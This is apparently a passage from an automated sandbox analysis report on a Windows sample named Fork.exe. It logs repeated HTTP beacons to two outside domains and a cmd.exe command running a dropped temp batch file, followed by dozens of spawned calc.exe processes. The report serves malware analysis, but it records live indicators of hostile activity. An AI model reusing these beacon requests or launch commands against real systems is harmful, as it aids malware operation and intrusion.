                                                                        Mar 16, 2025 23:04:47.932394028 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:47 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.9497003.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:49.721376896 CET307OUTGET /logo.gif?3925b70=239693248 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:50.169111967 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:50 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.9497043.229.117.57807112C:\Users\user\Desktop\Fork.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:50.789079905 CET300OUTGET /logo.gif?3db8193=582454827 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: arimaexim.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:51.260462046 CET335INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:51 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162691|1742162671|3|8|0; path=/; domain=.arimaexim.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        16192.168.2.9497073.229.117.5780
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 16, 2025 23:04:53.936327934 CET307OUTGET /logo.gif?47a8101=225411843 HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                        Host: bhagavatirannade.org
                                                                        Cache-Control: no-cache
                                                                        Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; snkz=8.46.123.189
                                                                        Mar 16, 2025 23:04:54.378576994 CET342INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sun, 16 Mar 2025 22:04:54 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162694|1742162670|3|9|0; path=/; domain=.bhagavatirannade.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:18:04:24
                                                                        Start date:16/03/2025
                                                                        Path:C:\Users\user\Desktop\Fork.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Fork.exe"
                                                                        Imagebase:0x400000
                                                                        File size:233'472 bytes
                                                                        MD5 hash:63B6CEBEFEC52083AC42EB8A39AB6683
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:1
                                                                        Start time:18:04:24
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\fontdrvhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"fontdrvhost.exe"
                                                                        Imagebase:0x7ff712150000
                                                                        File size:827'408 bytes
                                                                        MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:2
                                                                        Start time:18:04:24
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe"
                                                                        Imagebase:0x7ff7102a0000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:3
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff74be10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:4
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\fontdrvhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"fontdrvhost.exe"
                                                                        Imagebase:0x7ff712150000
                                                                        File size:827'408 bytes
                                                                        MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:10
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:18:04:25
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\dwm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"dwm.exe"
                                                                        Imagebase:0x7ff62b3c0000
                                                                        File size:94'720 bytes
                                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:13
                                                                        Start time:18:04:27
                                                                        Start date:16/03/2025
                                                                        Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                                                                        Imagebase:0x7ff6826e0000
                                                                        File size:4'099'584 bytes
                                                                        MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:14
                                                                        Start time:18:04:27
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:18:04:29
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:18:04:30
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:18:04:31
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:18:04:31
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:19
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:20
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:24
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:25
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:18:04:33
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:27
                                                                        Start time:18:04:35
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:28
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:29
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:30
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:31
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:32
                                                                        Start time:18:04:36
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:33
                                                                        Start time:18:04:37
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff65c6e0000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:35
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:36
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:37
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:38
                                                                        Start time:18:04:39
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:39
                                                                        Start time:18:04:42
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:40
                                                                        Start time:18:04:42
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:41
                                                                        Start time:18:04:42
                                                                        Start date:16/03/2025
                                                                        Path:C:\Windows\System32\calc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:calc.exe
                                                                        Imagebase:0x7ff6e2a40000
                                                                        File size:27'648 bytes
                                                                        MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        No disassembly